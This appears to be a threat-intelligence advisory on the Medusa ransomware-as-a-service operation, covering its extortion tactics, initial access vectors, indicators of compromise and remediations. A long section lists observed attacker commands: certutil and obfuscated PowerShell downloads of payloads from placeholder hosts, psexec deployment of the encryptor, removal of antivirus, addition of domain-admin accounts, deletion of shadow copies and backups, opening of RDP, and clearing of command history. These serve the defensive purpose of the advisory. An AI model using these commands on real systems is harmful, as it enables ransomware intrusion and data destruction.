Executive Summary

Those using the Medusa Ransomware-as-a-Service (RaaS) have demanded ransoms ranging from $100,000 to $15 million USD. According to CISA, the ransom note instructs victims to respond within 48 hours using either a live chat on the Tor browser or Tox, a secure end-to-end encrypted messaging platform. If the victim fails to comply, Medusa operators will attempt to contact them directly via phone or email. Victims are given 10 days to pay and are charged $10,000 USD per day if they want to extend this deadline. Like other threat actors, the Medusa ransomware attacks have engaged in double extortion tactics involving data exfiltration of sensitive information prior to encrypting the victim's systems. There is precedent for the compromised data to be shared on both an onion leak site as well as a public Telegram channel. According to the leak site, organizations that have been most impacted by this ransomware variant reside in the United States and are targeting various critical infrastructure sectors such critical manufacturing, finance, education, legal, insurance, information technology, and public healthcare / medical industries. Since the Medusa RaaS was first identified in June 2021, more than 300 organizations have been impacted as of February 2025.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) do not recommend organizations to pay ransoms as there is no guarantee that files or systems will be restored, and such compliance with adversary demands simply encourages these attacks.

Attack Methodology

Symantec researchers have identified a new threat group called Spearwing, which consistently employs the same tactics, techniques, and procedures. This suggests that, rather than acting as brokers for other affiliates, they are directly carrying out attacks while refining their ransomware.

Palo Alto's Unit 42 Threat Intelligence analysts have discovered that phishing campaigns is a primary method to hijack legitimate accounts, which in turn are supplied by initial access brokers to other threat actors in order to enter target networks. Additionally, initial access is suspected to result from exploiting unpatched vulnerabilities in public-facing Microsoft Exchange Servers. CISA has indicated that other software vulnerabilities includes, but is not limited to, ScreenConnect (https://www.cve.org/CVERecord?id=CVE-2024-1709) and Fortinet EMS SQL injection (https://www.cve.org/CVERecord?id=CVE-2023-48788).

The FBI investigations of Medusa threat actors have uncovered the following Living off the land (LOTL) techniques.


cmd.exe /c certutil -f urlcache https:///.css .dll
cmd.exe /c certutil -f urlcache https:///.msi .msi
cmd.exe /c driverquery
cmd.exe /c echo Computer: %COMPUTERNAME% & `<br>echo Username: %USERNAME% &` echo Domain: %USERDOMAIN% & `<br>echo Logon Server: %LOGONSERVER% &` echo DNS Domain: %USERDNSDOMAIN% & `<br>echo User Profile: %USERPROFILE% & echo` System Root: %SYSTEMROOT%
cmd.exe /c ipconfig /all
cmd.exe /c net share
cmd.exe /c net use
cmd.exe /c netstat -a
cmd.exe /c sc query
cmd.exe /c schtasks
cmd.exe /c systeminfo
cmd.exe /c ver
cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname
cmd.exe /c wmic printjob
mmc.exe compmgmt.msc /computer:{hostname/ip}
mstsc.exe /v:{hostname/ip}
mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}
`powershell -exec bypass -enc <base64 encrypted command string>`
`powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RMM tool>.msi)`
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('')-f'<character data-preserve-html-node="true" replacement 0>', '<character data-preserve-html-node="true" replacement 1>','<character data-preserve-html-node="true" replacement 2>')))), [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
powershell Remove-Item (Get-PSReadlineOption).HistorySavePath
powershell Get-ADComputer -Filter * -Property * \| Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate, logonCount,whenChanged,whenCreated,ipv4Address \| Export-CSV -Path -NoTypeInformation -Encoding UTF8
psexec.exe -accepteula -nobanner -s \{hostname/ip} "c:\windows\system32\taskkill.exe" /f /im WRSA.exe
psexec.exe -accepteula -nobanner -s \{hostname/ip} -c coba.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -c openrdp.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -c StopAllProcess.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -c zam.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} c:\temp\x.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} cmd
psexec.exe -accepteula -nobanner -s \{hostname/ip} cmd /c "c:\gaze.exe"
psexec.exe -accepteula -nobanner -s \{hostname/ip} cmd /c "copy \ad02\sysvol\gaze.exe c:\gaze.exe
psexec.exe -accepteula -nobanner -s \{hostname/ip} cmd /c "copy \ad02\sysvol\gaze.exe c:\gaze.exe && c:\gaze.exe"
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -c coba.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -c openrdp.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -c zam.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} cmd
psexec.exe -accepteula -nobanner -s \{hostname/ip} -u {user} -p {pass} -с newuser.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с duooff.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с hostname/ipwho.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с newuser.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с removesophos.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с start.bat
psexec.exe -accepteula -nobanner -s \{hostname/ip} -с uninstallSophos.bat
nltest /dclist:
net group "domain admins" /domain
net group "Domain Admins" default /add /domain
net group "Enterprise Admins" default /add /domain
net group "Remote Desktop Users" default /add /domain
net group "Group Policy Creator Owners" default /add /domain
net group "Schema Admins" default /add /domain
net group "domain users" /domain
net user default /active:yes /domain
net user /add default /domain
query user
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0
systeminfo
vssadmin.exe Delete Shadows /all /quiet
vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded
del /s /f /q %s.VHD %s.bac %s.bak %s.wbcat %s.bkf %sBac kup.* %sbackup. %s.set %s.win %s*.dsk
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Medusa actors have used Ligolo (https://github.com/nicocha30/ligolo-ng) as a reverse tunneling tool as well as Cloudflared as a tunneling daemon to proxy traffic in order to reach applications, services, or servers.

Rclone (https://rclone.org/) is used for data exfiltration purposes. Furthermore, Sysinternals PsExec (https://learn.microsoft.com/en-us/sysinternals/downloads/psexec), PDQ Deploy (https://www.pdq.com/pdq-deploy/), or BigFix (https://www.hcl-software.com/bigfix) have been used by the Medusa actors to execute the AES-256 encryptor known as `gaze.exe` on files within the victim network. Unit 42 researchers have discovered another unique tactic was using the publicly available SoftPerfect Network Scanner (https://www.softperfect.com/products/networkscanner/) portable version with an augmented `netscan.xml` file, which provided a configuration to use custom functions named "Copy_Gaze", "Deploy Gaze", and "Copy_Run_Gaze". These correspond with enclosed scripts with Cyrillic characters that translate to the following network survey actions.

Indicators of Compromise:

!!!READ_ME_MEDUSA!!!.txt is the expected ransom note file

Encrypted files will have a .medusa file extension

openrdp.bat allows incoming RDP and WMI connections with following commands:

netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

pu.exe spawns a reverse shell

Email addresses affiliated with Medusa actors include:

Remediations:

Validate a data recovery plan to ensure sensitive and proprietary data is safeguarded in a secure location separate from the on-premise equipment.
Regularly backup this data and validate data restoration is possible and timely.
Require all service, administrator, and domain accounts to implement robust password requirements, especially a long character length to bolster security.
Requiring VPNs for remote access
Enforce multifactor authentication (MFA) to the fullest extent possible for access
Disable command-line and script execution policies to ensure that threat actors are unable to use the aforementioned methods to facilitate privilege escalation and lateral movement.

Additional Information

If your organization has been affected by a ransomware incident, please report the details to The FBI's Internet Crime Complaint Center (https://www.ic3.gov/Home/ComplaintChoice), an FBI Field Office (https://www.fbi.gov/contact-us/field-offices), CISA's Incident Reporting System (https://www.cisa.gov/report), emailing CISA's 24/7 Operations Center at report@cisa.gov, or calling 1-844-Say-CISA (1-844-729-2472)

The FBI could make use of the following information: